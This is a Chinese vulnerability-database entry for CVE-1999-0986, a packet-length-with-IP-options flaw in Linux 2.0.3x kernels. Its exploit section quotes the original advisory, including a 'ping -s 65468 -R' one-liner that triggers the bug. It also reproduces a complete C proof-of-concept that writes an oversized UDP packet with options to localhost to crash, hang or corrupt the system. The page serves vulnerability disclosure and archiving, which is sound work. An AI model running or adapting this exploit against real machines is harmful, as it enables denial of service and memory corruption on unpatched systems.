Linux带选项数据包长度漏洞

Linux带选项数据包长度漏洞

漏洞ID 1105639 漏洞类型 未知
发布时间 1999-12-08 更新时间 2005-05-02
图片[1]-Linux带选项数据包长度漏洞-安全小百科CVE编号 CVE-1999-0986
图片[2]-Linux带选项数据包长度漏洞-安全小百科CNNVD-ID CNNVD-199912-038
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19675
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-038
|漏洞详情
Linux2.0.3x版本的ping命令存在漏洞。本地用户通过发送带有-R(可记录路由)选项的大型数据包,引发拒绝服务。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/870/info

Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability

A vulnerability in the Linux kernel's TCP/IP allows local users to crash, hang or corrupt the system.

A local user can crash, hang or currupt the system by sending out a packet with options longer than the maximum IP packet length. An easy way to generate such packet is by using the command "ping -s 65468 -R ANYADDRESS". The -R option is for the IP record route option. Under kernel versions 2.2.X the command will fail with an message of "message too long".

The vulnerability seems to be the result of the kernel not checking aif packet with options is longer than the maximum packet size. A long packet seems to lead to memory corruption. 
*/


/* Exploit option length missing checks in Linux-2.0.38
   Andrea Arcangeli <[email protected]> */

#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>

main()
{
	int sk;
	struct sockaddr_in sin;
	struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
	char payload[PAYLOAD_SIZE];

	sk = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk < 0)
		perror("socket"), exit(1);

	if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
		perror("setsockopt"), exit(1);

	bzero((char *)&sin, sizeof(sin));

	sin.sin_port = htons(0);
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(2130706433);

	if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
		perror("connect"), exit(1);

	if (write(sk, payload, PAYLOAD_SIZE) < 0)
		perror("write"), exit(1);
}
|参考资料

来源:BID
名称:870
链接:http://www.securityfocus.com/bid/870

相关推荐: htpasswd Apache 1.3.31 – Local Overflow

htpasswd Apache 1.3.31 – Local Overflow 漏洞ID 1054622 漏洞类型 发布时间 2004-09-16 更新时间 2004-09-16 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享